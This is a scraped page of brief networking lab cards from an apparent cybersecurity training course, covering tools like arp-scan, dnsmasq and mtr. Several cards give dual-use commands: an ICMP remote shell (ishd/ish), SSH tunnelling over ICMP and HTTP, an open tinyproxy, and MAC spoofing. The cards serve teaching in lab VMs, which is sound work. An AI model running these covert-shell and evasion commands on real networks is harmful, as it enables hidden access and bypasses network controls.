Stacks Image 4614


Labs: arp-scan

Module 05
Advanced Networking
arp-scan 192.168.1.0/24

arp-scan the subnet.
Stacks Image 4635
CyberLabs
Stacks Image 4640


Labs: arpwatch

Module 05
Advanced Networking
arpwatch -h

arpwatch -i eth1
Stacks Image 4661
CyberLabs
Stacks Image 4666


Labs: balance

Module 05
Advanced Networking
Launch 3 Cyberlabs VM. Note down the IP address.
On Networking VM run
balance -f 8080 :80 :80
Stacks Image 4687
CyberLabs
Stacks Image 4692


Labs: bird

Module 05
Advanced Networking
bird
birdc
show protocols
Stacks Image 4713
CyberLabs
Stacks Image 4718


Labs: boinc

Module 05
Advanced Networking
boinc —help
boinc
Stacks Image 4739
CyberLabs
Stacks Image 4744


Labs: dog dns

Module 05
Advanced Networking
dog haja.me A NS MX TXT
Stacks Image 4765
CyberLabs
Stacks Image 4770


Labs: dhcp server

Module 05
Advanced Networking
Start the dhcpd server
/etc/init.d/udhcpd start

Get IP using client
udhcpc -i eth1

View the conf files at
/etc/udhcpd.conf
Stacks Image 4791
CyberLabs
Stacks Image 4796


Labs: dnsmasq dns server

Module 05
Advanced Networking
Start the dnsmasq server
/etc/init.d/dnsmasq start
nmap 127.0.0.1
Note port 53 is running
Get DNS record for dnsmasq
dog @127.0.0.1 haja.me
Stacks Image 4817
CyberLabs
Stacks Image 4822


Labs: dnstop

Module 05
Advanced Networking
dnstop eth1
Stacks Image 4843
CyberLabs
Stacks Image 4848


Labs: uuidgen

Module 05
Advanced Networking
uuidgen
uuidgen -h
Stacks Image 4869
CyberLabs
Stacks Image 4874


Labs: HAProxy

Module 05
Advanced Networking
haproxy -h
Stacks Image 4895
CyberLabs
Stacks Image 4900


Labs: HTTPTunnel

Module 05
Advanced Networking
Networking instance 1
Start the ssh server
mkdir /var/run/sshd
/etc/init.d/sshd start
nmap 127.0.0.1
(port 22 should be open)
ifconfig (note down the ip address)
Stacks Image 4921
CyberLabs
Stacks Image 4926


Labs: ICMPShell

Module 05
Advanced Networking
Networking VM 1
ishd -i 65535 -t -0 -p 1024

Networking VM 2
ish -i 65535 -t -0 -p 1024
Stacks Image 4947
CyberLabs
Stacks Image 4952


Labs: IP Calculator

Module 05
Advanced Networking
ipcalc 10.0.0.0/24
(Choose different subnets)
Stacks Image 4973
CyberLabs
Stacks Image 4978


Labs: Macchanger

Module 05
Advanced Networking
macchanger -r eth1

macchanger -h
Stacks Image 4999
CyberLabs
Stacks Image 5004


Labs: mtr traceroute

Module 05
Advanced Networking
mtr haja.me
Stacks Image 5025
CyberLabs
Stacks Image 5030


Labs: tinyproxy

Module 05
Advanced Networking
Edit the file
/etc/tinyproxy/tinyproxy.conf
Change the Listen 127.0.0.1
to
Listen 0.0.0.0

Remove the lines
Allow 127.0.0.1
Allow ::1
Stacks Image 5051
CyberLabs
Stacks Image 5056


Labs: ptunnel

Module 05
Advanced Networking
Launch 2 instances of Networking Labs
VM 1
type ifconfig and note down the ip address
ptunnel

VM2
ptunnel -p -lp 8000 -da -dp 22 -c eth1
Stacks Image 5077
CyberLabs
Stacks Image 5082


Labs: logrotate

Module 05
Advanced Networking
logrotate —help

Configuration files are located at
/etc/logrotate
/etc/logrotate.d
Stacks Image 5155
CyberLabs
Stacks Image 5160


Labs: logrotate

Module 05
Advanced Networking
logrotate —help

Configuration files are located at
/etc/logrotate
/etc/logrotate.d
Stacks Image 5181
CyberLabs
Stacks Image 5186


Labs: proxytunnel

Module 05
Advanced Networking
Launch tinyproxy
tinyproxy
Launch proxytunnel

proxytunnel -v -p 127.0.0.1:8888 -d 127.0.0.1:22
Stacks Image 5103
CyberLabs
Stacks Image 5108


Labs: Mitre-Attack Framework

Module 03
Cybersecurity Standards and Frameworks
Goto https://mitre-attack.github.io/attack-navigator/
Click Create New Layer —> Enterprise
Stacks Image 5233
CyberLabs
Stacks Image 5238


Labs: Cybersafe

Module 04
Cybersecurity Terminology
Visit Rocheston Cybersafe website. This site contains best practices for keeping users safe.

https://www.rocheston.com/cybersafe
Stacks Image 5259
CyberLabs
Stacks Image 5264


Labs: CISA

Module 03
Cybersecurity Terminology
Visit CISA cybersecurity best practices.

https://www.cisa.gov/topics/cybersecurity-best-practices
Stacks Image 5285
CyberLabs
Stacks Image 5290


Labs: Arp command

Module 02
Network Security Protocols
arp -h
arp -a (lists the contents of the arp cache)
Stacks Image 5311
CyberLabs
Stacks Image 5316


Labs: Google DNS

Module 02
Network Security Protocols
Goto https://dns.google.com in your web browser.
Type juggyboy.com
Stacks Image 5337
CyberLabs
Stacks Image 5342


Labs: Visual Traceroute

Module 02
Network Security Protocols
Goto https://gsuite.tools/traceroute
Type haja.me
Stacks Image 5363
CyberLabs
Stacks Image 5368


Labs: dnstracer command

Module 02
Network Security Protocols
Dnstracer is a command-line tool used for tracing the DNS (Domain Name System) resolution path for a given domain name or hostname.

dnstracer -v -o ibm.com
Stacks Image 5389
CyberLabs
Stacks Image 5394


Labs: Secure DNS

Module 02
Network Security Protocols
Enable Secure DNS in Firefox. Launch Firefox.
Goto settings —> Network settings.
Enable DNS over HTTPS
Stacks Image 5415
CyberLabs
Stacks Image 5420


Labs: DHCP Client

Module 02
Network Security Protocols
Obtain IP address from DHCP server.
udhcpc -h
udhcpc -i eth1
Stacks Image 5467
CyberLabs
Stacks Image 5472


Labs: VPN Client

Module 02
Network Security Protocols
Download and install Opera Web Browser.
Goto https://opera.com
Opera browser comes with free VPN.
Launch Opera and go to settings.
Enable VPN.
Stacks Image 5493
CyberLabs
Stacks Image 5498


Labs: Arp-scan

Module 02
Network Security Protocols
ifconfig -i eth2
udhcpc -i eth2
arp-scan —localnet
Stacks Image 5519
CyberLabs
Stacks Image 5524


Labs: Linux Commands

Module 01
Linux tutorials
Basic linux commands.
Stacks Image 5545
CyberLabs
Stacks Image 5550
Copyright 2023 Rocheston